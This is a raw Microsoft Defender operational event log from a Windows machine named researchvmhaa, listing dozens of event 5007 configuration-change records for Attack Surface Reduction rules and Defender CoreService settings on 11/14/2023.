Old value: Default\CoreService\CpuSensor\MonitoredTargets = msmpeng| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\MonitoredTargets = mpdefendercoreservice|msmpeng|nissrv

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=590 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\CpuSensor\HighThresholds = 95| New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\CpuSensor\HighThresholds = 95|95|95

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=589 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdTimerMonitorInterval = 0x1388 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerMonitorInterval = 0x493E0

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=588 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MdTrustedSubjectOrgs = New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedSubjectOrgs = Microsoft Corporation|DigiCert Inc

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=587 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdConfigHash = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdConfigHash = 0x51AE05A1

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=586 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\MdTrustedRootCertThumbPrints = New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\MdTrustedRootCertThumbPrints = CB3CCBB76031E5E0138F8DD39A23F9DE47FFC35E43C1144CEA27D46A5AB1CB5F|4348A0E9444C78CB265E058D5E8944B4D84F9662BD26DB257F8934A443C70161

11/14/2023 10:52:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=585 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\CoreService\WdTimerInitalDelay = 0x1388 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\CoreService\WdTimerInitalDelay = 0x493E2

11/14/2023 10:42:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=581 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender

11/14/2023 10:42:33 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=580 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0

11/14/2023 10:42:30 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=579 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1

11/14/2023 10:42:14 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=578 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1

11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=577 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6

11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=576 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6

11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=575 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6

11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=574 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6

11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=573 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6

11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=572 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6

11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=571 Keywords=None TaskCategory=None OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=570 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=569 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=568 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=567 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=566 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=565 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=564 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=563 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/14/2023 10:22:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=562 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=561 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=560 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. 
If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=559 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=558 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=557 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=556 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=555 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=554 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=553 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=552 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=551 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=550 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=549 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=548 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 11/14/2023 10:21:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=547 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x0 11/14/2023 10:20:24 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=546 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 New value: 11/14/2023 10:20:24 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=545 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=544 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=543 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=542 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
